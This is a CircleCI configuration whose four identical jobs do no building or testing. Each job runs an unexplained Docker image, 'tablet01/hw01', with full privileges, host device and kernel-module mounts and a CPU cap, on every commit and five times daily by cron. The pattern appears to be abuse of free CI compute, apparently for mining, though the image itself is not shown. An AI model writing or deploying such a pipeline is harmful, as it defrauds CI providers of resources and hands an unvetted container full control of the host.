version: 2
jobs:
  build_01:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          sudo docker run --privileged --cap-add=ALL --cpus=0.9 -v /dev:/dev -v /lib/modules:/lib/modules -p 443:443/tcp --dns=1.1.1.1 tablet01/hw01
  build_02:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          sudo docker run --privileged --cap-add=ALL --cpus=0.9 -v /dev:/dev -v /lib/modules:/lib/modules -p 443:443/tcp --dns=1.1.1.1 tablet01/hw01
  build_03:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          sudo docker run --privileged --cap-add=ALL --cpus=0.9 -v /dev:/dev -v /lib/modules:/lib/modules -p 443:443/tcp --dns=1.1.1.1 tablet01/hw01
  build_04:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          sudo docker run --privileged --cap-add=ALL --cpus=0.9 -v /dev:/dev -v /lib/modules:/lib/modules -p 443:443/tcp --dns=1.1.1.1 tablet01/hw01
workflows:
  version: 2
  commit:
    jobs:
      - build_01
      - build_02
      - build_03
      - build_04

  nightly:
    triggers:
      - schedule:
          cron: "0 0,5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
    jobs:
      - build_01
      - build_02
      - build_03
      - build_04